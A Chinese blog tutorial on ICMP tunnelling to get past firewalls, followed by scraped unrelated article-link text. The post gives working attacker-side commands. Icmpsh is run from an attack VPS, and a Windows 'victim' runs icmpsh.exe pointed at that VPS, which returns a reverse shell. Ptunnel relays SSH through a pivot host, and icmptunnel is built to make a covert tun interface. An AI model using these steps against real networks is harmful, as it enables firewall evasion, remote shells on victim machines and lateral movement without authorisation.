重生信息安全
作者:Ice

1、ICMP隧道的建立同样是建立在ICMP未被防火墙禁用的情况下使用的,就是PING命令,其原理就是在ICMP报文传输的时候,替换其中的Data部分的数据,并且对端通过一样的工具进行ICMP畸形包的处理。从而将恶意流量隐藏在ICMP数据包中,形成ICMP隧道。

适用于被攻击主机可ping攻击机,可作为临时绕过防火墙。

2、Icmpsh

1、ICMPSH最大的优点是不需要太大的权限即可使用

其使用环境拓扑图可能为这样,不过其他的协议(除IMCP外的协议)与端口都被中间看不见的FireWall所阻挡。

2、我们在运行此程序时需要关闭自身的ICMP应答(可能需要另外下载一个python包)

关闭应答:

sysctl -w net.ipv4.icmp_echo_ignore_all=1               

apt-get  install  python-impacket

3、然后在VPS攻击机上运行

./icmpsh_m.py <VPS-IP> <内网出网口的公网地址>(可能为内网防火墙的地址,可通过TcpDump 监听ICMP ,在受害主机上进行PING VPS 从而得知,两者要能互相PING通)

 例如:./icmpsh_m.py    192.168.49.138    192.168.49.129

4、接着在内网受害主机下(windows)执行

icmpsh.exe  -t   VPS_IP    -d  500     -s  128

可直接获取shell

5、总结:Icmpsh 使用简单,通过imcp协议绕过防火墙对其他协议的阻拦。要求是两者能够相互ping通信,可直接反弹shell。

3、ptunnel(kali自带)

1、此工具虽然与ICMPSH一样都是使用ICMP协议进行通信的,但是不一样的是,ICMPSH常用于直接反弹shell,而ptunnel采用的是隧道中转,因此需要内网存在一个跳板机

2、同样它需要把自身的ICMP响应关闭

 sysctl -w net.ipv4.icmp_echo_ignore_all=1

3、这里构造一个拓扑如下

4、在B主机(跳板服务器)和主机C装上Ptunnel(kali自带)

5、B主机 开启ptunnel

C主机:

ptunnel  -p  192.168.137.128  -lp  1234  -da  192.168.44.130  -dp  22

-p :跳板机的ip -lp:自己监听的端口 -da:内网目标的主机IP -dp:想连接的目标的端口

C主机最后在ssh -p 22 127.0.0.1 或者D主机 ssh -p 22 192.168.137.129 即可

6、总结:ptunnel 用于内网流量的中转,以ICMP协议为通道,起到一个内网跳板机的作用。

4、IcmpTunnel,效果和ICMPSH差不多

git clone https://github.com/jamesbarlow/icmptunnel.git

1、cd icmptunnel&&make

2、接下来在A建立一个服务段,在B建立一个客户端

A:

./icmptunnel -s && bg /sbin/ifconfig tun0 10.0.0.1 netmask 255.255.255.0

B:

./icmptunnel   A-IP  && bg /sbin/ifconfig tun0 10.0.0.2 netmask 255.255.255.0

3、最终效果为以下,两者建立一个特定IP的通道进行连接

参考文章:

https://www.freebuf.com/sectool/210450.html

2012禁用ip隧道 win_IMCP协议的魅力——IMCP隧道相关推荐

  1. 2012禁用ip隧道 win_Windows 7下关闭IPV6隧道的技巧方法

    在如今的工作.生活中,电脑上网通常都是使用IPv4通道,很少会使用IPv6,并不是说IPv6不好,而是平时根本不需要使用到IPv6,IPv4足够使用,那么我们可以将其关闭,有利于系统运行的流畅性,那么 ...

  2. 2012禁用ip隧道 win_windows server 2008 R2 禁用ipv6和隧道适配器

    这篇文章主要介绍了windows server 2008 R2 禁用ipv6和隧道适配器,需要的朋友可以参考下 在windows server 2008 R2操作系统下部署weblogic web a ...

  3. 常见TCP/IP、HTTP协议以及三次握手和四次挥手

    面试常见TCP/IP.HTTP协议以及三次握手和四次挥手 IP(Internet Protocol):网际协议 IP协议是用于将多个包交换网络连接起来的,它在源地址和目的地址之间传送一种称之为数据包的 ...

  4. 计算机网络(OSI、TCP/IP、网络协议、常见网络设备工作原理)

    目录 OSI模型 TCP/IP模型 网络协议 IP协议 IP数据报格式 IP数据报分片 IPv4地址 NAT协议 ARP/RARP协议 ARP RARP DHCP协议 ICMP协议 ICMP差错报告报 ...

  5. 【详解】以下关于TCP/IP协议栈中协议和层次的对应关系正确的是()

    以下关于TCP/IP协议栈中协议和层次的对应关系正确的是 解析: TCP协议和UDP协议都是基于IP协议的. 基于TCP的应用层协议:FTP.Telnet.SMTP.HTTP.POP3与DNS 基于U ...

  6. http与https与socket tcp/IP与UDP 协议等

    网络由下往上分为:   物理层--                       数据链路层-- 网络层--                       IP协议 传输层--               ...

  7. 修改Linux SSH连接端口和禁用IP,安装DDoS deflate

    测试系统:centos7 修改连接端口 修改配置文件 vi /etc/ssh/sshd_config 去掉port 22的注释,添加新的端口配置 port your_port_num 自定义端口选择建 ...

  8. 网际协议IP与其配套协议

    网际协议IP与其配套协议 @(计算机网络) IP协议是TCP/IP协议簇中最重要的两大协议之一.与其配套的协议有: 地址解析协议–ARP 逆地址解析–RARP 网际控制报文协议–ICMP 网际组管理协 ...

  9. 【ubuntu】禁用IP和端口

    禁用IP和端口 1.方法1:iptables iptables v1.8.4Usage: iptables -[ACD] chain rule-specification [options]iptab ...

最新文章

  1. Hacker(六)----黑客藏匿之地--系统进程
  2. 解决Inno Setup制作安装包无法创建桌面快捷方式的问题
  3. 漫画:什么是MapReduce
  4. python-DBSCAN密度聚类
  5. 2017-2018-1 20155227 《信息安全系统设计基础》第四周学习总结
  6. 将 nginx 安装成 windows 的方法
  7. scala的字符串的方法(五)
  8. 云计算之Docker
  9. spark StandAlone模式下的作业提交流程
  10. 有序多分类Logistic回归(图文+数据集)【SPSS 079期】
  11. Silverlight 5的新功能预测
  12. java 视频处理_Java结合FFmpeg实现视频处理
  13. 【洛谷】P1216数字三角形
  14. 分享一下新的echarts离线文档
  15. 计算机等级保护 备案,信息安全等级保护备案实施细则
  16. [硬件选型] 工业相机之相机分类
  17. 数学:(一直很浮躁)
  18. vim/Gvim安装插件
  19. 从VHDL到UVM验证平台转变的优点评估
  20. 一些关于网页设计的优秀网站

热门文章

  1. 2字段添加注释_2w字长文给你讲透了配置类为什么要添加 @Configuration注解
  2. Keras——用Keras搭建RNN分类循环神经网络
  3. 人工智能目标检测模型总结(三)——yolov1模型(1)
  4. 机器学习之监督学习(一)——决策树
  5. 【C语言局部变量/静态局部变量/全局变量与静态全局变量
  6. tensorflow RGB三通道图转换为灰度图
  7. tf.gradients ---错误FetchargumentNonehasinvalidtype
  8. oracle数据库索引
  9. 福州大学软件工程1916|W班 第10、11次作业成绩排名
  10. SQL SERVER中的二种获得自增长ID的方法